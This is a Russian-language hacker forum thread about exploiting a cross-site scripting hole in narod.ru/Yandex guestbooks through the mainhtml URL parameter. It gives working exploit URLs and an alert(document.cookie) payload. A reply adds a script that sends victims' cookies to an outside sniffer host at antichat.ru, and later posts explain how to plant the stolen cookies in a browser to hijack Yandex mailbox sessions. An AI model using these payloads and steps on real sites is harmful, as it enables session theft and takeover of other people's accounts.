Не знаю было это или нет... Вообщем читаемс... 1. _http://www.narod.ru/guestbook/?owner=49329156&mainhtml=%3Cscript%3Ealert()%3C/script%3E 2. Создали себе сайт с гостевой книгой... Создайем на сайте файл - text.txt Зайходим в сорцы нашей гесты, копирусем все и вставляем в text.txt... Теперь надо нам просто добавить скрипт - ловушку, я добавил просто <script>alert(document.cookie);</script>... Правим сцылку... Первоночально сцылка на гесту показывает нам, что гостевуха в домене narod.ru, а значит там нам не будет показываться полные куки... Ну дык какая хрен разница? Исправим ейе на narod.yandex.ru... Теперь а чтоже делать с text.txt? Добавляем к ссылке на гесту &mainhtml=text.txt Теперь заходим по этой ссылке и видимс наши печенюшки =))) Извиняюсь, если это уже где то было... =)))) Вот моя геста = _http://www.narod.yandex.ru/guestbook/?owner=49329156&mainhtml=text.txt Скажу сразу там нет снифера! =))))
Все круто но вот вопрос как примерно сделаь чтобы кукисы на сниффер отсылались? и еще, сижу я в мастерской и открываю твою ссылку мне выдаются кукисы моей страницы на народе. А если в это время сидеть в ящике от yandexa то выдадутся кукисы от ящика???
Да! =) Code: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???
Нет в строку браузера вобще то только сессию можно подставить. Куки подмени в текстовом файле, там где все твои куки. (пример: C:\Documents and Settings\...\Cookies) Или если там пароль не зашифрован, то просто впиши его.
D=p=ch= Mod= Спасибо что напомнил! Помню читал где то давно, а щас забыл голова то дырявая. Ну че юзаем по тихоньку Xss
Если ты пользователь Оперы, то заходи Инструменты->Дополнительно->Cookies... Находи домен яндекса и меняй значения... =))
SQL? PHPinj? Чеж не пользуешься? Или не продаж? Богатым станешь... Мы пока еще дети нам учиться и учиться...
